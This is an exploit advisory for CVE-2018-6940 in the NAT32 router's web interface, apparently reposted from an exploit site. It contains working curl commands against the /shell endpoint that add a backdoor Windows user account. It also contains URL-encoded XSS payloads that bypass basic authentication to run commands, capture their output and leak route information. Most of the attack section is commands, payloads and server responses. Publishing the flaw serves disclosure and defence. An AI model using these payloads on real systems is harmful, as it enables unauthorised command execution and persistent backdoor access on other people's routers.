NAT32 2.2 Build 22284 - Remote Command Execution Vulnerability

[+] Credits: hyp3rlinx  

 
Vendor:
=============
www.nat32.com
 
 
Product:
=================
NAT32 Build (22284)
 
 
NAT32 is a versatile IP Router implemented as a WIN32 application.
 
 
Vulnerability Type:
===================
Remote Command Execution 
 
 
CVE Reference:
==============
CVE-2018-6940
 
 
Security Issue:
================
NAT32 listens on Port 8080 for its Web interface.
 
C:\>netstat -ano | findstr 8080
  TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING       3720
 
 
If the 'Password Checking' (BASIC authentication) feature is NOT enabled (user must select it under config tab) then remote attackers who can reach
NAT32 can potentially execute arbitrary commands, if authentication is enabled they will get 'Unauthorized' server reply, however, read on ...
 
e.g.
 
Add user account.
 
C:\>curl "http://x.x.x.x:8080/shell?cmd=run+net+user+D1rty0Tis+abc123+/add"
<!DOCTYPE html>
<html>
<body><pre>run start net user D1rty0Tis abc123 /add Done
</pre></body></html>
 
 
If NAT32 'Password Checking' feature IS enabled, remote attackers can STILL potentially issue arbitrary commands exploiting a
Cross Site Scripting vulnerability in the HTTPD code of NAT32, if authenticated NAT32 users click a malicious link
or visit an attacker controlled webpage. 
 
Also worth mentioning, NAT32 implements BASIC authentication which pass BASE64 Encoded credentials which can be easily
revealed if sniffed on network.
 
When 'Password Checking' is enabled attackers using Ajax calls via XSS would need to use a combination of '%0D%0A' and double encoding
to deal with 'white-space' in order for the payload to stay intact.
 
%25 for '%' sign then 20 (%2520) = %20, using %20 or %2B will not cut it, however '%0D%0A' (CRLF) and '%2520' encoding serves us well.
 
NAT32 has an interesting Command 'EXECR' that can allow attackers to capture Command output response from the server to see right away if an
attack was success or not.
 
e.g.
 
Add account and get response (EXECR)
 
HTTP Response:
<!DOCTYPE html>
<html>
<body><pre>The command completed successfully.
 
execr net user D1rty0Tis abc123 /add Done
</pre></body></html>
 
 
The NAT32 'winroute' Command will return host route information.
 
XSS response
 
e.g.
 
<!DOCTYPE html>
<html>
<body><pre>Destination    Mask              Nexthop      Metric IfIndex Type Proto Age
0.0.0.0         0.0.0.0         192.168.1.2        10       b    4     3 21:41 [min:sec]
127.0.0.0       255.0.0.0       127.0.0.1          306      1    3     3 22:04 [min:sec]
127.0.0.1       255.255.255.255 127.0.0.1          306      1    3     3 22:04 [min:sec]
127.255.255.255 255.255.255.255 127.0.0.1          306      1    3     3 22:04 [min:sec]
</pre></body></html>
 
 
Exploit/POC:
=============
NET32 Password Checking not enabled...
 
C:\>curl "http://x.x.x.x:8080/shell?cmd=run+net+user+D1rty0Tis+abc123+/add"
 
 
NAT32 BASIC authentication enabled use XSS...
 
Add backdoor account and capture CMD output using NAT32 'execr' shell command.
http://x.x.x.x:8080/shell?cmd=<script>var%0D%0Axhr=new%0D%0AXMLHttpRequest();xhr.onreadystatechange=function(){if(xhr.status==200){alert(xhr.responseText);}};xhr.open('GET','http://x.x.x.x:8080/shell?cmd=execr%2520net%2520user%2520D1rty0Tis%2520abc123%2520/add',true);xhr.send(null);</script>
 
Get Windows Routes (info disclosure):
http://x.x.x.x:8080/shell?cmd=%3Cscript%3Evar%0D%0Axhr=new%0D%0AXMLHttpRequest();xhr.onreadystatechange=function(){if(xhr.status==200){alert(xhr.responseText);}};xhr.open(%27GET%27,%27http://x.x.x.x:8080/shell?cmd=winroute%27,true);xhr.send(null);%3C/script%3E

#  0day.today [2018-02-18]  #